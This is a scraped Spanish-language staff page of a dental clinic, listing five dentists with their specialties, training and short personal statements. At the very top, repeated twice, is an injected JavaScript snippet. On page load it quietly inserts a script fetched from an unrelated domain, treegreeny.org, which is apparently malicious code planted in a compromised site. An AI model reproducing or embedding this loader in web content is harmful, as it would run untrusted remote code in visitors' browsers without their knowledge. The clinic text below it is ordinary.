;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Nuestros Especialistas – Clinica Atención Odontológica Integral


Quienes somos

NUESTROS ESPECIALISTAS

Clínica Atención Odontológica Integral
Omar Andres Ibarra

Dr. Omar A. Ibarra

Especialista en Ortodoncia – U de A

Diseñamos soluciones de tratamiento individualizadas, usando materiales de alta calidad y de marcas mundialmente reconocidas por la innovación y la investigación.


Ver Perfil


Dr. Santiago Ibarra

Odontólogo Estético – Universidad de antioquia

Diariamente me enfrento a retos profesionales los cuales me permiten lograr un equilibrio entre lo científico y artístico, logrando de esta manera una armonía dento-facial y por ende una sonrisa estética, funcional y natural para mis pacientes.


Ver Perfil

Adriana Ariza

Dra. Adriana Ariza

Odontóloga General – U de A

Si puedo crear un momento inolvidable y generar confianza entre el paciente como un amigo y yo a su mismo nivel, la intervención diagnóstica o el tratamiento termina convirtiéndose en un proceso satisfactorio, cómodo y eficaz.


Ver Perfil



carolina gallego

Dra. Carolina Gallego

Periodoncista – CES

Cada día se amanece con entusiasmo por iniciar una nueva jornada de aplicación de lo que me gusta hacer, donde puedo ayudar a muchas personas a mejorar su salud y su calidad de vida.


Ver Perfil

Laura Angel

Dra. Laura Angel

Odontopediatra – U de A

Los Niños son mis pacientes favoritos, por eso el trato más especial es para ellos. Sus sonrisas y especialmente su confianza me llena de felicidad al realizar mi trabajo. Creo que lo que hago es lo mejor en mi vida.



Derechos reservados para Clinicaaoi.com | Sitio administrado por Contenidos El Barco. All rights reserved.